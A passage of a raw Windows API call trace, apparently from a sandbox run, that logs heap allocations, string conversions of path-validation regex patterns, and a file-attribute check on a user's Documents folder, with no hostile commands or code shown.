[0259.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0259.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0259.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0259.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16e8 [0259.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0259.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0259.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0259.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0259.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17e8 [0259.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0259.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0259.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0259.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3d0 [0259.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0259.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0259.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0259.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0259.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0259.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0259.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0259.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0259.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0259.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0259.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0259.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0259.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0259.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0259.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0259.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0259.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0259.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0259.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0259.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0259.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0259.120] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0259.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0259.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0259.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0259.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0259.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0259.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0259.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0259.120] CharUpperBuffW (in: lpsz="SSA4B00E03609", cchLength=0xd | out: lpsz="SSA4B00E03609") returned 0xd [0259.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0259.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0259.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0259.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0259.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0259.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0259.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0259.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0259.121] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0259.121] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0259.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0259.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0259.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0259.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0259.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0259.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0259.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0259.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0259.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0259.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0259.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0259.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0259.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0259.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0259.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0259.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0259.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0259.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0259.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0259.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0259.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0259.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0259.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0259.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0259.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0259.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0259.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0259.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0259.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0259.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0259.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0259.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0259.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0259.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0259.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0259.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0259.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0259.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0259.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0259.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0259.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0259.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0259.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0259.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0259.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0259.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0259.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0259.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0259.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0259.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0259.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0259.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0259.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0259.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0259.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0259.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0259.124] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0259.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0259.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0259.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0259.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0259.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0259.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0259.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0259.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0259.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0259.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0259.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0259.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0259.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0259.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0259.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0259.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0259.124] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0259.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0259.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x9) returned 0x34aa5b0 [0259.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x34aa5b0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0259.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0259.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x52) returned 0x249a840 [0259.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0259.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", cchWideChar=40, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 40 [0259.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x28) returned 0x249f1d0 [0259.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", cchWideChar=40, lpMultiByteStr=0x249f1d0, cbMultiByte=40, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpUsedDefaultChar=0x0) returned 40 [0259.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0259.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b39d0 [0259.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0259.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0259.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0259.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0259.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0259.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0259.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0259.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0259.125] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0259.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0259.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3260 [0259.126] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x24b3260, cbMultiByte=40, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 40 [0259.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a528 [0259.126] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x24b3260, cbMultiByte=40, lpWideCharStr=0x240a528, cchWideChar=40 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 40 [0259.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0259.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a5d8 [0259.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a528 | out: hHeap=0x25c0000) returned 1 [0259.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3260 | out: hHeap=0x25c0000) returned 1 [0259.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0259.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a5d8 | out: hHeap=0x25c0000) returned 1 [0259.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0259.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0259.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.126] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0259.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249a840 | out: hHeap=0x25c0000) returned 1 [0259.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0259.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0259.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0259.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b39d0 | out: hHeap=0x25c0000) returned 1 [0259.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0259.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0259.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0259.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0259.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0259.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0259.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0259.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0259.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0259.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0259.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0259.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x2420898 [0259.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0259.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0259.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0259.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0259.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0259.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0259.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0259.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0259.127] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0259.127] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0259.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0259.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0259.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0259.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0259.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0259.128] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0259.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0259.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0259.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0259.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0259.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0259.128] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0259.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0259.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0259.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0259.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0259.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0259.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0259.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0259.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0259.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0259.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0259.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0259.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0259.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0259.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0259.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0259.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0259.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0259.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x17) returned 0x2466df0 [0259.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x2466df0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 